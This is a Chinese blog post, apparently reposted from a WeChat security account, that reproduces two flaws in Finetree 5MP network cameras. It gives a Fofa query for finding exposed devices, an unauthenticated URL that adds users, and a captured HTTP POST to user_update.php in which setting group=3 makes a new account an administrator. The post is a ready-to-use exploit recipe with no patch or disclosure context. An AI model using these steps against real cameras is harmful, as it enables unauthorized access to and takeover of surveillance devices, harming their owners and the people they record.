Finetree-5MP-摄像机双漏洞复现

admin

102262
文章

87
评论

2021年6月23日02:00:50评论370 views字数 847阅读2分49秒阅读模式

Fofa搜索：https://fofa.so/

app="Finetree-5MP-Network-Camera"

Finetree-5MP-摄像机双漏洞复现

漏洞复现

未授权访问添加 [未登录状态的]

exp：http://ip:port/quicksetup/user_pop.php?method=add

添加回出现报错，不用管，直接登录即可

Finetree-5MP-摄像机双漏洞复现

另一个漏洞：

已知低权限更改高权限，添加用户，用burp抓包看看什么情况

添加一个测试账号，test,得到的请求包是这样：

 1 POST /quicksetup/user_update.php HTTP/1.1 2 Host: x.x.x,x:8086 3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 4 Accept: */* 5 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 6 Accept-Encoding: gzip, deflate 7 Content-Type: application/x-www-form-urlencoded 8 Content-Length: 52 9 Origin: http://x.x.x.x:808610 Connection: close11 Referer: http://x.x.x.x:8086/quicksetup/user_pop.php?method=add12 Cookie: PHPSESSID=g02lv1iu0aod4ao75ioil2m0m313 14 method=add&user=test&pwd=123456&group=1&ptz_enable=0

以上ip经过处理

group是组，1代表guest,2是operator,3是administrator，截断修改group=可以修改为管理员权限。

Finetree-5MP-摄像机双漏洞复现

本文始发于微信公众号（暗影安全）：Finetree-5MP-摄像机双漏洞复现

左青龙
微信扫一扫

右白虎
微信扫一扫

Finetree-5MP-摄像机双漏洞复现

【论文速读】|理解基于大语言模型的模糊测试驱动程序生成

Web攻击应急响应 | 干货

基于ChatGPT大语言模型，通过聊天机器人自动创建vulhub的漏洞靶机环境

科恩BinaryAI@ICSE2024论文解读｜基于大模型的二进制软件成分分析

网络认证：一文带你了解Juniper认证体系！

eBPF及HTTPS明文抓包的分析

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

shiro反序列化漏洞绕waf防护的方法总结 | 干货

关于我挖洞的经历

LLM 安全 | 大语言模型应用安全入门

发表评论

在线咨询

微信